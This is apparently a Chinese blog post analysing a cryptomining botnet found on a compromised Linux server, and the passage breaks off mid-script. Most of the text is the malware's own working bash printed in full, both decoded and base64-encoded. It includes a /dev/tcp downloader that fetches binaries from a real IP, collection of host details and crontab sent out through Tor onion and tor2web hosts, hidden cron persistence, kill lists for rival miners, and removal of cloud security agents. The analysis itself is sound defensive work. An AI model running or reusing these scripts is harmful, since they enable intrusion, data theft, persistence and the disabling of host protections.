bWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash";
    Runtime runtime = Runtime.getRuntime();
    Process process = runtime.exec(arrayOfString);
  }
}

这一大段 base64 解出来,内容如下

XRANDOM
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

function kurl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

rm -f $HOME/ss
curl -V || wget -q https://github.com/moparisthebest/static-curl/releases/download/v7.75.0/curl-amd64 -O $HOME/curl;chmod +x $HOME/curl
curl -V || kurl http://139.59.150.7:443/curl > $HOME/curl;chmod +x $HOME/curl
ss -v   || kurl http://139.59.150.7:443/ss   > $HOME/ss;chmod +x $HOME/ss
ss -v   || curl -s http://139.59.150.7:443/ss -o $HOME/ss;chmod +x $HOME/ss
ps      || curl -s http://139.59.150.7:443/ps -o $HOME/ps;chmod +x $HOME/ps

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "rxmxpzfkydkulhhqnuftbmf6d5q67jjchopmh4ofszfwwnmz4bqq2fid")

sockz() {
n=(doh.nl.ahadns.net dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.no.ahadns.net doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}

fexe() {
for i in . $HOME /usr/bin $d /tmp /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
f=/l/sp.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done

好家伙,过来过去,从 bash 到 elf 再到 jar,一直都是这个 bash 脚本。

一切都是为了这个 bash 脚本服务。

其中有一段下载文件的步骤,之前也看到了,但是没有仔细分析。在曾大佬的带领下,一行一行分析了这个bash的功能.


function kurl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  HOST=${server//:*}
  PORT=${server//*:}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
  (while read line; do
   [[ "$line" == $'\r' ]] && break
  done && cat) <&3
  exec 3>&-
}

rm -f $HOME/ss
curl -V || wget -q https://github.com/moparisthebest/static-curl/releases/download/v7.75.0/curl-amd64 -O $HOME/curl;chmod +x $HOME/curl
curl -V || kurl http://139.59.150.7:443/curl > $HOME/curl;chmod +x $HOME/curl
ss -v   || kurl http://139.59.150.7:443/ss   > $HOME/ss;chmod +x $HOME/ss
ss -v   || curl -s http://139.59.150.7:443/ss -o $HOME/ss;chmod +x $HOME/ss
ps      || curl -s http://139.59.150.7:443/ps -o $HOME/ps;chmod +x $HOME/ps

这个 kurl,试图在没有 curl,没有 wget 的情况下,依赖 bash 内置功能,下载 curl。看起来这个攻击者是想要在类似于 docker 内部这样的刀耕火种的原始环境里面实现挖矿的功能。

我推测攻击者会一些计算机编程,但是功底肯定不会这么深厚,这段代码很可能不是攻击者自己写的。要是他有手写这个代码的水平,那肯定不会搞挖矿这个行当了。带着这个疑问,搜索了一圈,找到了代码的出处

分析过来分析过去,没看到其他有用的信息了,根据努力不一定能成功,放弃一定很轻松的指导方针,tracepath 这个文件的分析暂时到此为止。

EQnR3jNR

这个文件的主要作用是通过 crontab 添加持久化, 通过多种方式横向移动的功能。

通过动态调试该文件,可以看到执行了如下的 bash 命令。

nU9WagjQ8BenWPXt0ovE12uD8jBItv6
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)

x() {
if ! ls $d/.systemd-private-*.sh; then
grep "nU9WagjQ8BenWPXt0ovE12uD8jBItv6" $d/.systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho nU9WagjQ8BenWPXt0ovE12uD8jBItv6\necho blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash" > $d/.systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh
touch -r /bin/grep $d/.systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh
chmod +x $d/.systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh
fi
if ! ls /opt/systemd-private-*.sh; then
grep "nU9WagjQ8BenWPXt0ovE12uD8jBItv6" /opt/systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh || echo -e "#\x21/bin/bash\nexec &>/dev/null\necho nU9WagjQ8BenWPXt0ovE12uD8jBItv6\necho blU5V2FnalE4QmVuV1BYdDBvdkUxMnVEOGpCSXR2NgpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLnRoaXMud2ViLmlkIGRvaC5wb3N0LWZhY3R1bS50ayBkbnMuaG9zdHV4Lm5ldCB1bmNlbnNvcmVkLmx1eDEuZG5zLm5peG5ldC54eXogZG5zLnJ1YnlmaXNoLmNuIGRucy50d25pYy50dyBkb2gtZmkuYmxhaGRucy5jb20gZmkuZG9oLmRucy5zbm9weXRhLm9yZyByZXNvbHZlci1ldS5sZWx1eC5maSBkb2gubGkgZG5zLmRpZ2l0YWxlLWdlc2VsbHNjaGFmdC5jaCkKcD0kKGVjaG8gImRucy1xdWVyeT9uYW1lPXJlbGF5LnRvcjJzb2Nrcy5pbiIpCnM9JCgkYyBodHRwczovLyR7blskKChSQU5ET00lMTEpKV19LyRwIHwgZ3JlcCAtb0UgIlxiKFswLTldezEsM31cLil7M31bMC05XXsxLDN9XGIiIHx0ciAnICcgJ1xuJ3xncmVwIC1FdiBbLl0wfHNvcnQgLXVSfGhlYWQgLW4gMSkKfQoKZmV4ZSgpIHsKZm9yIGkgaW4gLiAkSE9NRSAvdXNyL2JpbiAkZCAvdmFyL3RtcCA7ZG8gZWNobyBleGl0ID4gJGkvaSAmJiBjaG1vZCAreCAkaS9pICYmIGNkICRpICYmIC4vaSAmJiBybSAtZiBpICYmIGJyZWFrO2RvbmUKfQoKdSgpIHsKc29ja3oKZj0vaW50LiQodW5hbWUgLW0pCng9Li8kKGRhdGV8bWQ1c3VtfGN1dCAtZjEgLWQtKQpyPSQoY3VybCAtNGZzU0xrIGNoZWNraXAuYW1hem9uYXdzLmNvbXx8Y3VybCAtNGZzU0xrIGlwLnNiKV8kKHdob2FtaSlfJCh1bmFtZSAtbSlfJCh1bmFtZSAtbilfJChpcCBhfGdyZXAgJ2luZXQgJ3xhd2sgeydwcmludCAkMid9fG1kNXN1bXxhd2sgeydwcmludCAkMSd9KV8kKGNyb250YWIgLWx8YmFzZTY0IC13MCkKJGMgLXggc29ja3M1aDovLyRzOjkwNTAgJHQub25pb24kZiAtbyR4IC1lJHIgfHwgJGMgJDEkZiAtbyR4IC1lJHIKY2htb2QgK3ggJHg7JHg7cm0gLWYgJHgKfQoKZm9yIGggaW4gdG9yMndlYi5pbiB0b3Iyd2ViLml0CmRvCmlmICEgbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1czsgdGhlbgpmZXhlO3UgJHQuJGgKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL3RtcDt1ICR0LiRoKQpscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvZGV2L3NobTt1ICR0LiRoKQplbHNlCmJyZWFrCmZpCmRvbmUK|base64 -d|bash" > /opt/systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh
touch -r /bin/grep /opt/systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh
chmod +x /opt/systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh
fi
if ! ls /etc/cron.d/0systemd-private-*; then
grep nU9WagjQ8BenWPXt0ovE12uD8jBItv6 /etc/cron.d/0systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6 || echo "$(echo $((RANDOM%59))) * * * * root /opt/systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh > /dev/null 2>&1 &" > /etc/cron.d/0systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6
touch -r /bin/grep /etc/cron.d/0systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6
fi
if ! crontab -l | grep ^[0-9] | grep systemd-private; then
(echo "$(echo $((RANDOM%59))) * * * * $d/.systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh > /dev/null 2>&1 &";crontab -l|grep -v systemd-private-nU9WagjQ8BenWPXt0ovE12uD8jBItv6.sh)|crontab -
fi
}
x

解 base64 之后可以发现功能是检查 $HOME/.systemd-private-*.sh 是否存在,如果不存在,那么把前面分析过的恶意脚本的内容加进去。运气比较好,刚开始在机器上手撕病毒的时候,这几个自启动恶意程序都删掉了。

代码里面包含大量的 bash64编码的内容。逆向分析的主要工作是动态调试然后解 base64和解决 00 截断导致的错误然后继续解base64 :)

nU9WagjQ8BenWPXt0ovE12uD8jBItv6
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
find /etc/cron*|xargs chattr -i;find /var/spool/cron*|xargs chattr -i;chattr -i /etc/hosts
crontab -l ;grep -iRE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" /etc/cron.*|cut -f 1 -d :|xargs rm -f
crontab -l |grep -ivE "Evie0EAJrdlD6N9|tEYYDFeOnouIdvpQ|vPUjpEzwu4WUekG|systemd-service|data/pg_|main/pg_|pg_logical|cache/auto|ctlib|70OXQG|Malware|Miner|VUses5|\-unix|\.\/oka|\.configrc|\.rsync|\/upd|aliyun|basht|bffbe|curl|jqu\.js|jqu2|kill_virus|virus|kpccv|malware|mazec|nullc|qcloud|rvlss|ryukd|system-python3.8-Updates|systemd-init|th2ps|titanagent|tmp00|ucxin|unixdb|unixoa|wget|wlvly|xzfix|pg_stat|pty3|zsvc|pdefenderd|smcard2|wakuang|delmining|base64" |crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/pgsql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/lib/postgresql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /var/log/postgresql"|crontab -
crontab -l |grep -v "[*] [*] [*] [*] [*] /etc/postgresql/"|crontab -
grep -q onion /etc/hosts && sed -i '/onion/d' /etc/hosts
grep -q tor2w /etc/hosts && sed -i '/tor2w/d' /etc/hosts
netstat -antp|grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199"|awk {'print $NF'} |cut -d/ -f1|xargs kill -9
pkill -9 -f "kthreaddi|defunct|./cron|./oka|\-unix|/tmp/ddgs|/tmp/idk|/tmp/java|/tmp/keep|/tmp/udevs|/tmp/udk|/tmp/update.sh|/tmp/yarn|/usr/bin/netfs|8220|AliHids|AliSecGuard|AliYunDun|descargars|Donald|HT8s|Jonason|steasec|salt-store|salt-minion|SzdXM|X13-unix|X17-unix|\[stea\]|aegis_|AliYunDun|AliHids|AliHips|AliYunDunUpdate|aliyun-service|azipl|bash64|bigd1ck|cr.sh|crloger|cronds|crun|cryptonight|curn|currn|ddgs|dhcleint|fs-manager|gf128mul|havegeds|httpdz|irqbalanced|JavaUpdate|system-python3.8-Updates|java-c|kaudited|kdevtmpfsi|kerberods|khugepageds|kinsing|kintegrityds|kpsmouseds|swapd0|kswaped|knthread|kthreadds|kthrotlds|kw0|kworkerds|kworkre|kwroker|liog|lsof|lopata|Macron|mewrs|migrations|miner|mmm|mr.sh|muhsti|mygit|netdns|networkservice|orgfs|pamdicks|pastebin|postgresq1|qW3xT|qwefdas|rctlcli|sleep|stratum|sustes|sustse|sysguard|sysguerd|systeamd|systemd-network|sysupdate|sysupdata|t00ls|thisxxs|Trump|update.sh|vTtHH|watchbog|watchbug|watchog|wipefs|wnTKYg|x3Wq|xig|xmr|zer0|zsvc|pdefenderd|smcard2|rcu_sched"
ps x |grep -v grep|grep -E "kthreaddi|defunct|kinsing|kdevtmpfs|./oka|zsvc|pdefenderd|smcard2|swapd0|rcu_sched|AliSecGuard|AliYunDunUpdate|AliYunDun|aliyun-service|assist_daemon"|awk '{print $1}' |xargs -I % kill -9 %
ss -antp |grep -E "82.114.253.13|14.17.70.144|3.125.10.23|103.53.210.34|45.64.130.147|34.252.195.254|kinsing|kdevtmpfsi|103.3.62.64|104.140.201.42|104.140.244.186|107.178.104.10|107.191.99.221|107.191.99.95|116.203.73.240|131.153.56.98|131.153.76.130|136.243.102.154|138.201.20.89|138.201.27.243|138.201.36.249|139.162.132.70|139.162.60.220|139.162.81.90|139.99.101.197|139.99.101.198|139.99.101.232|139.99.102.70|139.99.102.71|139.99.102.72|139.99.102.73|139.99.102.74|139.99.120.50|139.99.120.75|139.99.123.196|139.99.124.170|139.99.125.38|139.99.156.30|139.99.68.128|142.44.242.100|142.44.243.6|144.217.14.109|144.217.14.139|147.135.37.31|149.202.42.174|149.202.83.171|15.236.100.141|151.80.144.188|158.69.25.62|158.69.25.71|158.69.25.77|163.172.203.178|163.172.206.67|163.172.207.69|163.172.226.114|163.172.226.137|172.104.143.224|172.104.151.232|172.104.159.158|172.104.165.191|172.104.247.21|172.104.76.21|172.105.205.58|172.105.205.68|172.105.210.117|172.105.211.250|172.105.235.97|178.63.100.197|18.180.72.219|18.210.126.40|192.110.160.114|192.99.69.170|195.154.62.247|195.201.12.107|199.231.85.124|207.246.100.198|213.32.29.143|213.32.74.157|217.182.169.148|23.88.160.140|3.0.193.200|37.187.95.110|37.59.43.131|37.59.44.193|37.59.44.93|37.59.54.205|37.59.55.60|37.9.3.26|45.32.71.82|45.76.65.223|45.79.192.137|45.79.200.97|45.79.204.241|45.79.210.48|46.4.120.18|47.101.30.124|5.196.13.29|5.196.23.240|51.15.54.102|51.15.55.100|51.15.55.162|51.15.58.224|51.15.65.182|51.15.67.17|51.15.69.136|51.15.78.68|51.255.34.118|51.255.34.79|51.255.34.80|51.81.245.40|54.188.223.206|54.37.7.208|66.42.105.146|78.46.49.222|78.46.87.181|81.25.55.79|81.91.189.245|88.99.142.163|88.99.193.240|88.99.242.92|91.121.140.167|94.130.12.27|94.130.12.30|94.130.143.162|94.130.165.85|94.130.165.87|94.130.239.15|94.23.23.52|94.23.247.226|95.216.209.67|205.185.118.204|63.250.33.43|185.199.11|139.99.121.227|199.192.30.2|185.156.179.225|45.129.2.107|194.87.102.77|172.83.155.151|185.165.171.78|70.39.125.244|205.185.118.204|54.37.7.208|209.141.38.71|150.107.76.231|107.167.7.226|194.40.243.61|195.3.146.118|20.53.100.173|20.62.240.187|94.130.164.163|45.9.148.117|168.235.88.209|161.97.140.214|193.23.250.136|95.216.46.125|95.181.179.88|104.244.78.33|15.228.36.177|203.107.32.162|194.38.20.199" |awk -F, {'print $(NF-1)'}|sed 's/pid=//g' |xargs kill -9 
rm -f $HOME/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh
rm -f /opt/.{Evie0EAJrdlD6N9,tEYYDFeOnouIdvpQ,vPUjpEzwu4WUekGs,systemd-service}.sh
ps ax -o "pid %cpu cmd"|grep bash|awk '{if($2>=20.0) print $1}'|xargs kill -9

上面这个脚本,我一直没有看太懂想干嘛,看起来像是在清理痕迹,灾后重建,又像是在清理竞争对手的挖矿木马,我没看懂他想干嘛,先跳过吧。

还有一段比较有趣的脚本。这看起来应该就是和前面 zscaler 提到的横向移动的功能了。

nU9WagjQ8BenWPXt0ovE12uD8jBItv6
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "5ixhieezozxwnvisopgxoba6ssbsrvdpxeduxb4jc6zx7s56rufrjzad")

sockz() {
n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}

fexe() {
for i in . $HOME /usr/bin $d /tmp /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

isys() { 
echo ZnVuY3Rpb24ga3VybCgpIHsKICByZWFkIHByb3RvIHNlcnZlciBwYXRoIDw8PCQoZWNobyAkezEvLy8vIH0pCiAgRE9DPS8ke3BhdGgvLyAvL30KICBIT1NUPSR7c2VydmVyLy86Kn0KICBQT1JUPSR7c2VydmVyLy8qOnKICBbWyB4IiR7SE9TVH0iID09IHgiJHtQT1JUfSIgXV0gJiYgUE9SVD04MAoKICBleGVjIDM8Pi9kZXYvdGNwLyR7SE9TVH0vJFBPUlQKICBlY2hvIC1lbiAiR0VUICR7RE9DfSBIVFRQLzEuMFxyXG5Ib3N0OiAke0hPU1R9XHJcblxyXG4iID4mMwogICh3aGlsZSByZWFkIGxpbmU7IGRvCiAgIFtbICIkbGluZSIgPT0gJCdccicgXV0gJiYgYnJlYWsKICBkb25lICYmIGNhdCkgPCYzCiAgZXhlYyAzPiYtCn0KCnJtIC1mICRIT01FL3NzCmN1cmwgLVYgfHwgd2dldCAtcSBodHRwczovL2dpdGh1Yi5jb20vbW9wYXJpc3RoZWJlc3Qvc3RhdGljLWN1cmwvcmVsZWFzZXMvZG93bmxvYWQvdjcuNzUuMC9jdXJsLWFtZDY0IC1PICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApjdXJsIC1WIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvY3VybCA+ICRIT01FL2N1cmw7Y2htb2QgK3ggJEhPTUUvY3VybApzcyAtdiAgIHx8IGt1cmwgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvc3MgICA+ICRIT01FL3NzO2NobW9kICt4ICRIT01FL3NzCnNzIC12ICAgfHwgY3VybCAtcyBodHRwOi8vMTM5LjU5LjE1MC43OjQ0My9zcyAtbyAkSE9NRS9zcztjaG1vZCAreCAkSE9NRS9zcwpwcyAgICAgIHx8IGN1cmwgLXMgaHR0cDovLzEzOS41OS4xNTAuNzo0NDMvcHMgLW8gJEhPTUUvcHM7Y2htb2QgK3ggJEhPTUUvcHMK|base64 -d|bash
crontab -l || yum -y install cron
crontab -l || yum -y install cronie
crontab -l || apt-get update && apt-get -y install cron
/usr/local/share/assist-daemon/assist_daemon --stop
/usr/local/share/assist-daemon/assist_daemon --delete
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
/usr/local/qcloud/stargate/admin/uninstall.sh
/usr/local/qcloud/YunJing/uninst.sh
/etc/init.d/aegis uninstall
systemctl stop aliyun
systemctl disable aliyun
systemctl start cron
systemctl enable cron
systemctl start crond
systemctl enable crond
rm -rf /usr/loca/qcloud/ /usr/local/aegis/ /usr/local/share/assist-daemon/ /usr/local/share/aliyun-assist/ /usr/sbin/aliyun-service /usr/sbin/aliyun_installer /etc/systemd/system/aliyun.service
}

issh() {
